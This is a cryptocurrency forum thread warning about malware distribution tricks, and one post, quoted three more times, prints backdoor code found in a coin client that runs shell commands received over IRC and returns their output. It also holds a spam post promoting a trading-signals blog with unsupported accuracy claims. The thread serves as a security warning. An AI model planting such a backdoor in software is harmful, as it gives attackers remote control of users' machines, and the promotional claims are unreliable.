Beware of Increasingly Sophisticated Malware Infection Attempts

[riffat]

No antivirus will protect you from the 0-day vulnerability. But following the rules of hygiene on the Internet, you at least protect yourself from 98% of threats.
I add that if you really want to go to the link, check it at first with the service virusotal:

Thanks for your good suggestion... 

[Masternodeking]

correct me if im wrong but maleware its generecly for executables in windows no? i mean the wallets are but its not kaspersky enough?
if not why do we need to protect from the case of reteiving passorws from the users and other stuff from enven pen drives with wallets (including the common coins ones) like doge ltc btc and a few more.

Has anyone heard of people gaining access to peoples private keys by watching them write it down by hacking the laptop camera. OR malware that will replace the pasted address with the hackers address.

[coindrunk]

If you are on Linux/Unix just use separate user accounts, with restricted access, for each wallet software that tends to be shady

[Becassine]

No antivirus will protect you from the 0-day vulnerability. But following the rules of hygiene on the Internet, you at least protect yourself from 98% of threats.
I add that if you really want to go to the link, check it at first with the service virusotal:

Thank you very much for that thing, I will post it in the french section. We don't have such a useful thread there 

[Becassine]

I don't know if this is a malware or what but everytime I copy an address and paste it where I should when I intent to send some funds the address is change some characters are omitted that's why when making transactions I used my phone instead of my pc, does anyone experience this too?..If this is a malware infection what should I do?

Evrial detects when a bitcoin address is copied to the clipboard, then proceeds to replace it with an address that is under the attacker's domain. However, the virus manages to paste this information into a different application, which makes it more complex, they say.

https://tuscamisetas.net/crypto/new-virus-changes-bitcoin-addresses-from-the-clipboard-to-one-from-the-attacker-criptonews/

[ksyusha_so]

I personally, didn"t confront anything like that, luckily, but thank you very much for the information. If I find someone, I'll add it to the list.

[mtthardy4]

If you needed to earn good profit through cryptocurrencies than go to this blog

http://cryptocurrenciesconsultant.blogspot.com/

Just buy its consultant service and he would predict and provide you good signals to buy and sell any crypto coins. His most of predication is about 90% perfect. He had good trading experienced to help out other traders as well.

If you had any question aobut how to buy / sell or any related question about the trading and cryptocurrencies than contact him.

I m also using his service from last few months. so i m sharing with you as well

[Becassine]

Hello,

I found a site that check if you have an account that has been compromised in a data breach (https://haveibeenpwned.com/), I want to know from the super geeks if this site is OK ? thank you and have a nice day

[Marble777]

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.

Obviously because we all know how much money this forum in digital form of course very tempting for hackers to use it by way of embed malware then we must be more careful

[coin0101]

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:

Code:

if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
	CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		CFree(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
	}
}

here is the source code with macros resolved:

Code:

if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
	FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		pclose(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
	}
}

The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

omg that's terrible thanks for sharing this

[asifcoiner23]

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:

Code:

if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
	CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		CFree(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
	}
}

here is the source code with macros resolved:

Code:

if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
	FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		pclose(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
	}
}

The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

omg that's terrible thanks for sharing this

[bitcoiner0101]

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:

Code:

if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
	CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		CFree(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
	}
}

here is the source code with macros resolved:

Code:

if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
	FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		pclose(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
	}
}

The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

omg that's terrible thanks for sharing this

[crypto440]

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:

Code:

if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
	CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		CFree(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
	}
}

here is the source code with macros resolved:

Code:

if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
	FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		pclose(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
	}
}

The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

what is the coins name can you please tell me and others so we don't fall for this

[Valer4ik]

excellent information thanks guys for the warning. you have done a great job, you are making our community safer. Another noticed one kind of SCAM .. that people who write to you in telegrams and represent managers of ICO projects and offer assistance in investing in their project .....

[Marble777]

excellent information thanks guys for the warning. you have done a great job, you are making our community safer. Another noticed one kind of SCAM .. that people who write to you in telegrams and represent managers of ICO projects and offer assistance in investing in their project .....

Not everything like that bro although everyone wants to get big profits with little effort but still there are many parties who are not tempted by doing a scam

[bembi]

Thanks that is realy serious i mean coping links would do that we all should be careful

[richiesuazo]

wooow, this is really a lot to swallow in for a newbie like me

[XtianSincero]

wow very much useful informations...we should be more cautious now specially downloading. thanks

[saieshprakash18]

thanks, this is helpful

[Raul Lopez]

I appreciate very much this info, thanks a lot!!